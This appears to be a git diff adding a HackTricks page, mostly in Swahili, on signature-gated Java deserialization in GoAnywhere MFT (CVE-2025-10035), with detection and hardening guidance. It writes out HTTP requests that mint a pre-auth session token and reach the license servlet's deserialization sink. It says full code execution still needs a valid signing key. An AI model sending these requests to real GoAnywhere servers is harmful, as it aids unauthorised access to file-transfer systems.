- watchTowr Labs Is This Bad? This Feels Bad — GoAnywhere CVE-2025-10035: https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-10035/
{{#include ../../banners/hacktricks-training.md}}

140
src/pentesting-web/deserialization/java-signedobject-gated-deserialization.md Normal file
View File

@ -0,0 +1,140 @@
# Java SignedObject-gated Deserialization na Upatikanaji wa Pre-auth kupitia Njia za Makosa
{{#include ../../banners/hacktricks-training.md}}
Ukurasa huu unaelezea muundo wa kawaida wa Java deserialization "iliyolindwa" unaojengwa karibu na java.security.SignedObject na jinsi sinks zinazojionyesha kuwa zisizofikika zinaweza kuwa zinapatikana kabla ya uthibitisho kupitia mtiririko wa kushughulikia makosa. Mbinu hii ilionekana katika Fortra GoAnywhere MFT (CVE-2025-10035) lakini inaweza kutumika kwa miundo inayofanana.
## Mfano wa tishio
- Mshambuliaji anaweza kufikia endpoint ya HTTP ambayo hatimaye inashughulikia byte[] iliyotolewa na mshambuliaji iliyokusudiwa kuwa serialized SignedObject.
- Msimbo unatumia validating wrapper (mf. Apache Commons IO ValidatingObjectInputStream au adapter maalum) kukandamiza aina ya nje kabisa kwa SignedObject (au byte[]).
- Kitu cha ndani kilichorudishwa na SignedObject.getObject() ndiko ambapo gadget chains zinaweza kuzinduka (mf. CommonsBeanutils1), lakini ni baada tu ya lango la uhakiki wa saini.
## Mfano wa kawaida wenye hatari
Mfano uliorahisishwa unaotokana na com.linoma.license.gen2.BundleWorker.verify:
```java
private static byte[] verify(byte[] payload, KeyConfig keyCfg) throws Exception {
String sigAlg = "SHA1withDSA";
if ("2".equals(keyCfg.getVersion())) {
sigAlg = "SHA512withRSA"; // key version controls algorithm
}
PublicKey pub = getPublicKey(keyCfg);
Signature sig = Signature.getInstance(sigAlg);
// 1) Outer, "guarded" deserialization restricted to SignedObject
SignedObject so = (SignedObject) JavaSerializationUtilities.deserialize(
payload, SignedObject.class, new Class[]{ byte[].class });
if (keyCfg.isServer()) {
// Hardened server path
return ((SignedContainer) JavaSerializationUtilities.deserializeUntrustedSignedObject(
so, SignedContainer.class, new Class[]{ byte[].class }
)).getData();
} else {
// 2) Signature check using a baked-in public key
if (!so.verify(pub, sig)) {
throw new IOException("Unable to verify signature!");
}
// 3) Inner object deserialization (potential gadget execution)
SignedContainer inner = (SignedContainer) so.getObject();
return inner.getData();
}
}
```
Key observations:
- The validating deserializer at (1) blocks arbitrary top-level gadget classes; only SignedObject (or raw byte[]) is accepted.
- The RCE primitive would be in the inner object materialized by SignedObject.getObject() at (3).
- A signature gate at (2) enforces that the SignedObject must verify against a product-baked public key. Unless the attacker can produce a valid signature, the inner gadget never deserializes.
## Mizingatio ya unyonyeshaji
Ili kufikia utekelezaji wa msimbo, muadui lazima awasilishe SignedObject iliyosainiwa ipasavyo ambayo inafunga gadget chain yenye madhara kama inner object. Hii kwa kawaida inahitaji mojawapo ya yafuatayo:
- Private key compromise: obtain the matching private key used by the product to sign/verify license objects.
- Signing oracle: coerce the vendor or a trusted signing service to sign attacker-controlled serialized content (e.g., if a license server signs an embedded arbitrary object from client input).
- Alternate reachable path: find a server-side path that deserializes the inner object without enforcing verify(), or that skips signature checks under a specific mode.
Bila mojawapo ya haya, uthibitisho wa saini utazuia unyonyeshaji licha ya kuwepo kwa deserialization sink.
## Pre-auth reachability via error-handling flows
Hata wakati endpoint ya deserialization inaonekana kuhitaji authentication au token iliyounganishwa na session, msimbo wa kushughulikia makosa unaweza kwa bahati mbaya kuunda na kushika token kwenye session isiyotambuliwa.
Example reachability chain (GoAnywhere MFT):
- Target servlet: /goanywhere/lic/accept/<GUID> requires a session-bound license request token.
- Error path: hitting /goanywhere/license/Unlicensed.xhtml with trailing junk and invalid JSF state triggers AdminErrorHandlerServlet, which does:
- SessionUtilities.generateLicenseRequestToken(session)
- Redirects to vendor license server with a signed license request in bundle=<...>
- The bundle can be decrypted offline (hard-coded keys) to recover the GUID. Keep the same session cookie and POST to /goanywhere/lic/accept/<GUID> with attacker-controlled bundle bytes, reaching the SignedObject sink pre-auth.
Proof-of-reachability (impact-less) probe:
```http
GET /goanywhere/license/Unlicensed.xhtml/x?javax.faces.ViewState=x&GARequestAction=activate HTTP/1.1
Host: <target>
```
- Unpatched: 302 Location header to https://my.goanywhere.com/lic/request?bundle=... na Set-Cookie: ASESSIONID=...
- Patched: redirect bila bundle (hakuna token generation).
## Blue-team detection
Viashiria katika stack traces/logs vinaonyesha kwa nguvu majaribio ya kufikia SignedObject-gated sink:
```
java.io.ObjectInputStream.readObject
java.security.SignedObject.getObject
com.linoma.license.gen2.BundleWorker.verify
com.linoma.license.gen2.BundleWorker.unbundle
com.linoma.license.gen2.LicenseController.getResponse
com.linoma.license.gen2.LicenseAPI.getResponse
com.linoma.ga.ui.admin.servlet.LicenseResponseServlet.doPost
```
## Mwongozo wa kuimarisha
- Hakikisha uthibitishaji wa saini unafanyika kabla ya mwito wowote wa getObject() na uhakikishe uthibitisho unatumia ufunguo/algoritimu ya umma iliyokusudiwa.
- Badilisha miito ya moja kwa moja ya SignedObject.getObject() na wrapper uliosimamiwa (hardened) ambao unatendee tena uchujaji kwenye stream ya ndani (mfano: deserializeUntrustedSignedObject ikitumia ValidatingObjectInputStream/ObjectInputFilter orodha za kuruhusu).
- Ondoa mitiririko ya error-handler ambayo hutoa token zinazounganishwa na session kwa watumiaji wasiojathibitishwa. Chukulia njia za makosa kama uso wa shambulio.
- Tumia kwa upendeleo Java serialization filters (JEP 290) zenye orodha kali za kuruhusu kwa deserialization za nje na za ndani. Mfano:
```java
ObjectInputFilter filter = info -> {
Class<?> c = info.serialClass();
if (c == null) return ObjectInputFilter.Status.UNDECIDED;
if (c == java.security.SignedObject.class || c == byte[].class) return ObjectInputFilter.Status.ALLOWED;
return ObjectInputFilter.Status.REJECTED; // outer layer
};
ObjectInputFilter.Config.setSerialFilter(filter);
// For the inner object, apply a separate strict DTO allow-list
```
## Muhtasari wa mnyororo wa shambulio (CVE-2025-10035)
1) Pre-auth token minting kupitia meneja wa makosa:
```http
GET /goanywhere/license/Unlicensed.xhtml/watchTowr?javax.faces.ViewState=watchTowr&GARequestAction=activate
```
Pokea 302 na bundle=... na ASESSIONID=...; decrypt bundle offline ili kupata GUID.
2) Fikia sink pre-auth na cookie sawa:
```http
POST /goanywhere/lic/accept/<GUID> HTTP/1.1
Cookie: ASESSIONID=<value>
Content-Type: application/x-www-form-urlencoded
bundle=<attacker-controlled-bytes>
```
3) RCE inahitaji SignedObject iliyosainiwa kikamilifu inayozunguka gadget chain. Watafiti hawakuweza kupitisha uthibitishaji wa saini; unyonyaji unategemea upatikanaji wa private key inayolingana au signing oracle.
## Toleo zilizosahihishwa na mabadiliko ya tabia
- GoAnywhere MFT 7.8.4 and Sustain Release 7.6.3:
- Imarisha deserialization ya ndani kwa kubadilisha SignedObject.getObject() na wrapper (deserializeUntrustedSignedObject).
- Ondoa uzalishaji wa token za error-handler, kukata ufikiaji wa pre-auth.
## Maelezo kuhusu JSF/ViewState
Mbinu ya kufikia inatumia ukurasa wa JSF (.xhtml) na javax.faces.ViewState isiyo halali ili kupitisha kwenye error handler iliyo na mamlaka. Ingawa sio tatizo la deserialization ya JSF, ni mtindo unaojirudia kabla ya uthibitisho (pre-auth): ingia kwenye error handlers zinazofanya vitendo vyenye mamlaka na kuweka attributes za session zinazohusiana na usalama.
## References
- [watchTowr Labs Is This Bad? This Feels Bad — GoAnywhere CVE-2025-10035](https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-10035/)
- [Fortra advisory FI-2025-012 Deserialization Vulnerability in GoAnywhere MFT's License Servlet](https://www.fortra.com/security/advisories/product-security/fi-2025-012)
{{#include ../../banners/hacktricks-training.md}}